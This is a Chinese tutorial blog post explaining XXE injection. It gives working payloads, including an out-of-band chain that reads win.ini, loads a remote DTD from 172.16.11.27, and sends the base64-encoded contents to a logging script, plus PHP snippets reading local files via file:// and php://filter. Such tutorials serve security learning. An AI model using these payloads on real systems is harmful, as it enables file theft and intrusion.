XXE注入漏洞

缺乏、安全感 2022-11-30 12:26 255阅读 0赞

### 目录 ###

*   *  什么是XML
     *  什么是DTD
     *  什么是实体
     *   *  system与public
     *  什么是XXE
     *   *  定义
         *  漏洞原理
     *  xxe漏洞与ssrf漏洞
     *  演示
     *  执行原理
     *  可利用的协议
     *   *  file
         *  http
         *  ……
     *  base64

## 什么是XML ##

要想清楚XXE漏洞，首先要了解XML  
XML 可扩展标记语言（`E`Xtensible `M`arkup `L`anguage）。

它是一门用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型。

XML 很像HTML，但是标签大小写敏感，且没有被预定义，需要自行定义标签，必须按顺序闭合标签，必须含有根元素，属性值须加引号。

它的文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。它的设计宗旨是传输数据，而不是显示数据。

这里要说的就是DTD。

## 什么是DTD ##

DTD（文档类型定义，`D`ocument `T`ype `D`efinition）的作用是定义 XML 文档的合法构建模块。  
它使用一系列的合法元素来定义文档结构。可以嵌入在XML文档中(内部声明)，也可以独立的放在一个文件中(外部引用)。如同html里的js一样，可以放在html页面里，也可以是单独的一个文件。

DTD文档组成  
1.元素（ELEMENT）的定义规则；  
2.元素之间的关系规则；  
3.属性（ATTLIST）的定义规则；  
4.可使用的实体（ENTITY）或符号（NOTATION）规则。

## 什么是实体 ##

实体可以理解成变量,给一段代码或数据起一个名字,方便在别的地方引用. 大致分为两类:  
1.一般实体(格式：& 实体引用名)  
2.参数实体(格式：% 实体引用名)  
其次还有内外之分,外部实体表示外部文件的内容,用 `SYSTEM` 关键词表示.而`造成XXE的一般就是外部实体`。

### system与public ###

那么xml是如何调用外部dtd的呢？  
语法是这样子的：  
`<!DOCTYPE 根元素名 SYSTEM "外部DTD文件的URI">`

SYSTEM表示DTD文件是私有的，是要自己定义的。

当然，标签虽然是自定义的，但是人总是懒惰的，如果已经有人定义了一个标签，当你要实现相同功能时，是不是首先想着的是能不能直接调用对方的标签，而不是自己再重新定义一个标签。

有一个叫W3C的组织来了，这个组织的工作是对 web 进行标准化。所以他定义了很多xml标签，这种标签叫公共标签。用public标注：  
`<!DOCTYPE 根元素名 public "外部DTD文件的URI">`  
直接调用就行，不需要自己再重新定义。

外部DTD文件的uri得用`引号`引起来。

## 什么是XXE ##

### 定义 ###

XXE (XML External Entity) ：XML外部实体，从安全角度理解成XML External Entity attack，即XML 外部实体注入攻击。

### 漏洞原理 ###

前面说到，XML可以从外部读取DTD文件，而实体部分是写在DTD文档里。所以引用外部实体实际上就是调用包含该实体的DTD文件。

调用DTD文件，自然是使用路径来识别的，那么我们就将路径换成其他文件的路径，比如原本设置`x`等于`1目录下b文件`里`y`的值，我们可以将这个路径换成`2目录下的a文件`，于是`x`就等于a文件里`y`的值了；然后在a文件里，`y`的值和c文件的`z`有关；而`z`的值又和b文件里的`γ`相关……

这就形成一个调用链甚至一个调用网，直到遇到合适的文件。什么文件呢？一个可以给参数赋值的文件。然后这个值，再一层一层的返回给最开始的文件。比如在上一段的例子里，如果我们能控制`γ`的值，那么`x`的值也就意味着可控。

那么如果将恶意代码传给`γ`，伪造成外部实体，发送给应用程序。当程序解析了我们伪造的外部实体时，就会把`γ`的值一步步经过相应处理，赋值给SYSTEM前面的根元素，就产生了一次xxe注入攻击。

注意：

php版本大于5.4.45的默认不解析外部实体

## xxe漏洞与ssrf漏洞 ##

两个漏洞很相似，功能、原理、造成的危害都相同。  
攻击本质都是一样的，都是由于攻击者只能访问A资源不能访问B资源，但是 A资源可以访问B资源，且A资源对请求、响应的检测不全面，被攻击者利用以脚本为请求参数，利用A资源执行攻击者输入的命令去访问B资源。

但是，发生的场景不同。xxe里，AB在同一主机上；ssrf中，AB不在同一个主机上。  
而xxe用的是DTD，利用实体注入的方式，将AB联系起来；  
ssrf，利用Http、File、FTP等协议，将AB联系在一起。

所以他们是两个不同的漏洞。

## 演示 ##

`simplexml_load_string`函数  
作用是将xml格式的字符串转换为对应的`SimpleXMLElement`

zz.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]load.html  
![在这里插入图片描述][20200903191023375.png_pic_center]  
test.php  
![在这里插入图片描述][20200903191046156.png_pic_center]

只要执行zz.php文件,就会生成一个load.txt文件  
![在这里插入图片描述][20200903191107982.png_pic_center]

## 执行原理 ##

zz.php

<!ENTITY % load SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">
    <!ENTITY % remote SYSTEM "http://172.16.11.27/xxe/load.xml"> 
    %remote;
    %send;

1.首先，运行zz.php的时候，定义load、remote两个传参实体,其功能分别为：

load:读取c:/windows/win.ini 里的内容
    remote:加载172.16.11.27/xxe/load.xml的内容

2.然后%remote： 执行remote实体，加载load.xml文件

规则是平等的，所以规则里面内置了规则，为了不起冲突，需要编码‘%’（%）

load.html

<!ENTITY % all
    	"<!ENTITY % send SYSTEM 'http://172.16.11.27/xxe/test.php?load=%load;'>"
    >
    %all;

3.加载load.xml文件后，执行all实体的时候，又执行load实体，并赋值给load（即%load的运行结果赋给load）

4.然后返回zz.php文件，再加载send实体，即运行load.xml里内置的send规则实体，加载test.php里的内容

test.php

<?php file_put_contents("load.txt",$_GET["load"],FILE_APPEND);?>

5.在test.php同路径下，新建一个load.txt文件（如果当前目录下没有load.php文件），并将load的值追加保存进去。

## 可利用的协议 ##

这里协议的作用不是跟ssrf一样。  
前面说了，ssrf里的协议是为了把AB联系起来。这里的协议是AB联系起来后，在B里面执行的操作。

比如下面的`file:///C:/Windows/system.ini`协议，只是用`file协议`执行`system.ini`文件。

### file ###

<?php
    	$xxe = '<!DOCTYPE scan [<!ENTITY xxe SYSTEM "file:///C:/Windows/system.ini">]><scan>&xxe;</scan>';
    	$obj = simplexml_load_string($xxe, SimpleXMLElement, LIBXML_NOENT);
    	print_r($obj);
    ?>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 1]

### http ###

<?php
    	$xxe = '<!DOCTYPE scan [<!ENTITY xxe SYSTEM "http://www.baidu.com/robots.txt">]><scan>&xxe;</scan>';
    	$obj = simplexml_load_string($xxe, SimpleXMLElement, LIBXML_NOENT);
    	print_r($obj);
    ?>

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 2]  
上面为了直观显示，就把A，B（即`$xxe`,`$obj`）放在一个文件里

### …… ###

## base64 ##

如果文件里面有<>等符号，服务器会当做xml的标签，然后就把他给过滤了。如下：

phpinfo.txt

<?php
     phpinfo(); 
    ?>

xxe.php

<?php
    	$xxe = '<!DOCTYPE scan [<!ENTITY xxe SYSTEM "file:///D:/phpStudy/WWW/phpinfo.txt">]><scan>&xxe;</scan>';
    	$obj = simplexml_load_string($xxe, SimpleXMLElement, LIBXML_NOENT);
    	print_r($obj);
    ?>

![在这里插入图片描述][20200824102339568.png_pic_center]  
虽然看不懂这里输出是啥东西，但绝对不是phpinfo.txt的内容。

所以需要编码一下

<?php
    	$xxe = '<!DOCTYPE scan [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=D:/phpStudy/WWW/phpinfo.txt">]><scan>&xxe;</scan>';
    	$obj = simplexml_load_string($xxe, SimpleXMLElement, LIBXML_NOENT);
    	print_r($obj);
    ?>

![在这里插入图片描述][20200824102521871.png_pic_center]

然后解码查看  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 3]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]: /images/20221123/58001076543948af8d3e3c4fc1ec7866.png
[20200903191023375.png_pic_center]: /images/20221123/fa0f3594eee14348bf8d8deb3224ca60.png
[20200903191046156.png_pic_center]: /images/20221123/38c9c9e2147540dea391bc96dee61228.png
[20200903191107982.png_pic_center]: /images/20221123/d6fa6d76c0124877ba782c73fb6b6b99.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221123/b277530ff9b8465c8b2e47698a6900e0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221123/de9f69a154624396885fd1cd4d47501b.png
[20200824102339568.png_pic_center]: /images/20221123/5af2a5f8741d43faaaff2be030db7506.png
[20200824102521871.png_pic_center]: /images/20221123/88d54687594f4cc7bd003280126d0b60.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221123/1094f8e0757744b49216d2dd626b9832.png